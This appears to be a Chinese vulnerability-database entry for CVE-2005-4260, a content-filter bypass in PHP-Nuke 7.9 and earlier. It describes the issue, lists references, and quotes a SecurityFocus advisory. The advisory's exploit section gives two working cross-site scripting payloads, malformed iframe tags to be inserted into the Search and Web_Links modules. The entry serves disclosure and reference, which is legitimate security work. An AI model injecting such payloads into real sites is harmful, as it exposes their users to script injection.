PHPNuke内容过滤绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109462 漏洞类型 跨站脚本
发布时间 2005-12-14 更新时间 2006-06-09
CVE编号 CVE-2005-4260 CNNVD-ID CNNVD-200512-316
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/26817
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-316
|漏洞详情
PHP-Nuke7.9及更高版本中的includes/mainfile.php存在解释冲突,远程攻击者可以通过将标签中的">"替换为"<"(可绕过净化数据的正则表达式但会被众多web浏览器自动校正)执行跨站脚本攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/15855/info

PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.

PHPNuke 7.9 and prior versions are reported to be vulnerable. 

URI:
http://www.example.com/[DIR]/modules.php?name=Search
Insert:
<iframe src=http://www.example.com?phpnuke79 <

URI:
http://www.example.com/[DIR]//modules.php?name=Web_Links
Insert:
<iframe src=http://www.example.com?phpnuke79 <
|参考资料

来源:BID
名称:15855
链接:http://www.securityfocus.com/bid/15855
来源:BUGTRAQ
名称:20051220Re:XSSbypassinPHPNuke-FIX?
链接:http://www.securityfocus.com/archive/1/archive/1/419991/100/0/threaded
来源:BUGTRAQ
名称:20051214BypassXSSfilterinPHPNUKE7.9=>x
链接:http://www.securityfocus.com/archive/1/archive/1/419496/100/0/threaded